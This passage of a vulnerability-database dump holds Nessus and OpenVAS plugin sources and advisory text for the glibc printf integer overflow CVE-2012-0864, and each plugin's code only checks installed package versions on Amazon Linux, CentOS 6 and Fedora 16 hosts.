"p-cpe:/a:amazon:linux:glibc-utils", "p-cpe:/a:amazon:linux:nscd", "p-cpe:/a:amazon:linux:glibc", "p-cpe:/a:amazon:linux:glibc-common", "p-cpe:/a:amazon:linux:glibc-debuginfo-common", "p-cpe:/a:amazon:linux:glibc-static", "cpe:/o:amazon:linux", "p-cpe:/a:amazon:linux:glibc-headers"], "id": "ALA_ALAS-2012-57.NASL", "href": "https://www.tenable.com/plugins/nessus/69664", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2012-57.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69664);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2012-0864\");\n script_xref(name:\"ALAS\", value:\"2012-57\");\n script_xref(name:\"RHSA\", value:\"2012:0393\");\n\n script_name(english:\"Amazon Linux AMI : glibc (ALAS-2012-57)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2012-57.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update glibc' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"glibc-2.12-1.47.37.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-common-2.12-1.47.37.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-2.12-1.47.37.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-debuginfo-common-2.12-1.47.37.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-devel-2.12-1.47.37.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-headers-2.12-1.47.37.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-static-2.12-1.47.37.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"glibc-utils-2.12-1.47.37.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"nscd-2.12-1.47.37.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:27:36", "description": "Updated glibc packages that fix one security issue and three bugs are\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nThis update also fixes the following bugs :\n\n* Previously, the dynamic loader generated an incorrect ordering for\ninitialization according to the ELF specification. This could result\nin incorrect ordering of DSO constructors and destructors. With this\nupdate, dependency resolution has been fixed. (BZ#783999)\n\n* Previously, locking of the main malloc arena was incorrect in the\nretry path. This could result in a deadlock if an sbrk request failed.\nWith this update, locking of the main arena in the retry path has been\nfixed. This issue was exposed by a bug fix provided in the\nRHSA-2012:0058 update. (BZ#795328)\n\n* Calling memcpy with overlapping arguments on certain processors\nwould generate unexpected results. While such code is a clear\nviolation of ANSI/ISO standards, this update restores prior memcpy\nbehavior. (BZ#799259)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain patches to resolve these issues.", "edition": 24, "published": "2012-03-20T00:00:00", "title": "CentOS 6 : glibc (CESA-2012:0393)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "modified": "2012-03-20T00:00:00", "cpe": ["p-cpe:/a:centos:centos:glibc-common", "cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:nscd", "p-cpe:/a:centos:centos:glibc-utils", "p-cpe:/a:centos:centos:glibc-devel", "p-cpe:/a:centos:centos:glibc-static", "p-cpe:/a:centos:centos:glibc-headers", "p-cpe:/a:centos:centos:glibc"], "id": "CENTOS_RHSA-2012-0393.NASL", "href": "https://www.tenable.com/plugins/nessus/58390", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0393 and \n# CentOS Errata and Security Advisory 2012:0393 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58390);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-0864\");\n script_bugtraq_id(52201);\n script_xref(name:\"RHSA\", value:\"2012:0393\");\n\n script_name(english:\"CentOS 6 : glibc (CESA-2012:0393)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue and three bugs are\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nThis update also fixes the following bugs :\n\n* Previously, the dynamic loader generated an incorrect ordering for\ninitialization according to the ELF specification. This could result\nin incorrect ordering of DSO constructors and destructors. With this\nupdate, dependency resolution has been fixed. (BZ#783999)\n\n* Previously, locking of the main malloc arena was incorrect in the\nretry path. This could result in a deadlock if an sbrk request failed.\nWith this update, locking of the main arena in the retry path has been\nfixed. This issue was exposed by a bug fix provided in the\nRHSA-2012:0058 update. (BZ#795328)\n\n* Calling memcpy with overlapping arguments on certain processors\nwould generate unexpected results. While such code is a clear\nviolation of ANSI/ISO standards, this update restores prior memcpy\nbehavior. (BZ#799259)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain patches to resolve these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-March/018503.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?17342915\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0864\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/03/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-common-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-devel-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-headers-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-static-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-utils-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"nscd-2.12-1.47.el6_2.9\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-static / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:38:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881169", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881169", "type": "openvas", "title": "CentOS Update for glibc CESA-2012:0393 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2012:0393 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-March/018503.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881169\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:32:18 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-0864\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"CESA\", value:\"2012:0393\");\n script_name(\"CentOS Update for glibc CESA-2012:0393 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"glibc on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The glibc packages provide the standard C and standard math libraries used\n by multiple programs on the system. Without these libraries, the Linux\n system cannot function correctly.\n\n An integer overflow flaw was found in the implementation of the printf\n functions family. This could allow an attacker to bypass FORTIFY_SOURCE\n protections and execute arbitrary code using a format string flaw in\n an application, even though these protections are expected to limit the\n impact of such flaws to an application abort. (CVE-2012-0864)\n\n This update also fixes the following bugs:\n\n * Previously, the dynamic loader generated an incorrect ordering for\n initialization according to the ELF specification. This could result in\n incorrect ordering of DSO constructors and destructors. With this update,\n dependency resolution has been fixed. (BZ#783999)\n\n * Previously, locking of the main malloc arena was incorrect in the retry\n path. This could result in a deadlock if an sbrk request failed. With this\n update, locking of the main arena in the retry path has been fixed. This\n issue was exposed by a bug fix provided in the RHSA-2012:0058 update.\n (BZ#795328)\n\n * Calling memcpy with overlapping arguments on certain processors would\n generate unexpected results. While such code is a clear violation of\n ANSI/ISO standards, this update restores prior memcpy behavior. (BZ#799259)\n\n All users of glibc are advised to upgrade to these updated packages, which\n contain patches to resolve these issues.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.12~1.47.el6_2.9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-04-02T00:00:00", "id": "OPENVAS:1361412562310863924", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863924", "type": "openvas", "title": "Fedora Update for glibc FEDORA-2012-2162", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glibc FEDORA-2012-2162\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-February/073668.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863924\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:36:48 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2012-0864\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-2162\");\n script_name(\"Fedora Update for glibc FEDORA-2012-2162\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"glibc on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.14.90~24.fc16.6\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-02T10:56:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "description": "Check for the Version of glibc", "modified": "2017-12-27T00:00:00", "published": "2012-04-02T00:00:00", "id": "OPENVAS:863924", "href": "http://plugins.openvas.org/nasl.php?oid=863924", "type": "openvas", "title": "Fedora Update for glibc FEDORA-2012-2162", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glibc FEDORA-2012-2162\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"glibc on Fedora 16\";\ntag_insight = \"The glibc package contains standard libraries which are used by\n multiple programs on the system. In order to save disk space and\n memory, as well as to make upgrading easier, common system code is\n kept in one place and shared between programs. This particular package\n contains the most important sets of shared libraries: the standard C\n library and the standard math library. Without these two libraries, a\n Linux system will not function.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-February/073668.html\");\n script_id(863924);\n script_version(\"$Revision: 8249 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 07:29:56 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:36:48 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2012-0864\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-2162\");\n script_name(\"Fedora Update for glibc FEDORA-2012-2162\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.14.90~24.fc16.6\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-06T13:07:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "description": "Check for the Version of glibc", "modified": "2018-01-04T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:881169", "href": "http://plugins.openvas.org/nasl.php?oid=881169", "type": "openvas", "title": "CentOS Update for glibc CESA-2012:0393 centos6 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2012:0393 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The glibc packages provide the standard C and standard math libraries used\n by multiple programs on the system. Without these libraries, the Linux\n system cannot function correctly.\n\n An integer overflow flaw was found in the implementation of the printf\n functions family. This could allow an attacker to bypass FORTIFY_SOURCE\n protections and execute arbitrary code using a format string flaw in\n an application, even though these protections are expected to limit the\n impact of such flaws to an application abort. (CVE-2012-0864)\n \n This update also fixes the following bugs:\n \n * Previously, the dynamic loader generated an incorrect ordering for\n initialization according to the ELF specification. This could result in\n incorrect ordering of DSO constructors and destructors. With this update,\n dependency resolution has been fixed. (BZ#783999)\n \n * Previously, locking of the main malloc arena was incorrect in the retry\n path. This could result in a deadlock if an sbrk request failed. With this\n update, locking of the main arena in the retry path has been fixed. This\n issue was exposed by a bug fix provided in the RHSA-2012:0058 update.\n (BZ#795328)\n \n * Calling memcpy with overlapping arguments on certain processors would\n generate unexpected results. While such code is a clear violation of\n ANSI/ISO standards, this update restores prior memcpy behavior. (BZ#799259)\n \n All users of glibc are advised to upgrade to these updated packages, which\n contain patches to resolve these issues.\";\n\ntag_affected = \"glibc on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-March/018503.html\");\n script_id(881169);\n script_version(\"$Revision: 8285 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-04 07:29:16 +0100 (Thu, 04 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:32:18 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-0864\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2012:0393\");\n script_name(\"CentOS Update for glibc CESA-2012:0393 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n 